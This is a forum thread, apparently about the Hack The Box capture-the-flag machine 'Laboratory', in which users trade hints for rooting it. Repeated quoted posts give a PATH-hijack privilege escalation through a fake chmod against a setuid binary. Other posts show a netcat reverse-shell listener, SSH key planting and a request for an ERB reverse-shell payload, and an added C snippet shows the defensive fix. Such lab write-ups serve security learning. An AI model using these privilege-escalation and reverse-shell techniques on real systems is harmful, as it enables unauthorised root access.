TUTORIAL Laboratory
by southerndarkness - November 14, 2020 at 11:51 PM
#37
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how you did it/found it? I'm really stuck trying to understand the meaning of the bin; I did ltrace and all but I still can't figure out how to privesc from here.

Nvm I did it, I rooted it. I may be blind.
How did you do it? Can you please explain?

There is a setuid binary, /usr/local/bin/docker-security. This chmods the docker socket, but doesn't declare a full path for the chmod command. We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But I'm still stuck in docker. How did you break out of docker?
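Added example, not part of any post in this thread and not the box's own code: the bare `chmod` call described above is resolved through the caller's PATH, and this C sketch shows two ways a setuid helper avoids that lookup. The function names, `SAFE_ENV` and the scratch file path are assumptions made for the illustration.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for any child: nothing is inherited from the caller. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Preferred fix: call chmod(2) directly. No shell, no PATH lookup and no
 * child process, so the caller's environment cannot influence the result. */
int set_mode_no_exec(const char *path, mode_t mode) {
    return chmod(path, mode);
}

/* Permission bits of path, or -1 on error (used to verify the result). */
int mode_of(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* If an external program is unavoidable: absolute path only, execve()
 * rather than execvp()/system(), and a fixed environment.
 * Returns the child's exit status, or -1 on refusal or error. */
int run_fixed(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                    /* a bare name would need PATH */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);                   /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    const char *demo = "/tmp/added-example-demo"; /* constructed scratch file */
    int fd = open(demo, O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) close(fd);
    set_mode_no_exec(demo, 0660);
    printf("mode now %o\n", mode_of(demo));
    unlink(demo);
    return 0;
}
```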
#38
(November 16, 2020 at 12:01 PM)ARhOmOuTEd Wrote:
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how you did it/found it? I'm really stuck trying to understand the meaning of the bin; I did ltrace and all but I still can't figure out how to privesc from here.

Nvm I did it, I rooted it. I may be blind.
How did you do it? Can you please explain?

There is a setuid binary, /usr/local/bin/docker-security. This chmods the docker socket, but doesn't declare a full path for the chmod command. We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But I'm still stuck in docker. How did you break out of docker?

You don't need to break out of docker. Can you become admin on gitlab?
#39
Hey, my rails console is blocked at "Switch to inspect mode" ... has this happened to you?

[email protected]:/tmp$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
Switch to inspect mode.

ok solved..

[email protected]:~/gitlab-rails/working$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0>
#40
(November 16, 2020 at 12:55 PM)iecoo7Ei Wrote:
(November 16, 2020 at 12:01 PM)ARhOmOuTEd Wrote:
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how you did it/found it? I'm really stuck trying to understand the meaning of the bin; I did ltrace and all but I still can't figure out how to privesc from here.

Nvm I did it, I rooted it. I may be blind.
How did you do it? Can you please explain?

There is a setuid binary, /usr/local/bin/docker-security. This chmods the docker socket, but doesn't declare a full path for the chmod command. We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But I'm still stuck in docker. How did you break out of docker?

You don't need to break out of docker. Can you become admin on gitlab?

Thanks, you helped me out, I got root now! :-)
#41
Nicely done, gentlemen ...

I don't know how some of these boxes are 20 pointers!
#42
Can anyone post a walkthrough up to the user flag?
#43
(November 18, 2020 at 11:03 PM)exord26 Wrote: Can anyone post a walkthrough up to the user flag?
Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.
#44
(November 19, 2020 at 07:43 AM)JustMeAndYou Wrote:
(November 18, 2020 at 11:03 PM)exord26 Wrote: Can anyone post a walkthrough up to the user flag?
Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.

I changed it, but what now?
How do I continue?
#45
Can anyone explain this box clearly to get root :)
#46
(November 22, 2020 at 04:08 PM)Shut Wrote: Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇
#47
(November 22, 2020 at 04:09 PM)0xvijay Wrote:
(November 22, 2020 at 04:08 PM)Shut Wrote: Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇
thanks for writeup :)
#48
Kali76 Wrote:

>>OK, I have a shell but where is the user flag?
>>[email protected]:~# rlwrap nc -nlvp 5555
>>Ncat: Version 7.80 ( https://nmap.org/ncat )
>>Ncat: Listening on :::5555
>>Ncat: Listening on 0.0.0.0:5555
>>Ncat: Connection from 10.10.10.216.
>>Ncat: Connection from 10.10.10.216:42898.

Can you tell me what erb payload you've used? (erb = ERB.new("<%=' ?????????????????' %>"))
I've successfully put my key in /var/opt/gitlab/.ssh/authorized_keys and even checked that my key is there, but I can't connect with ssh.
Now I want to try a reverse shell, but can't find a proper payload.
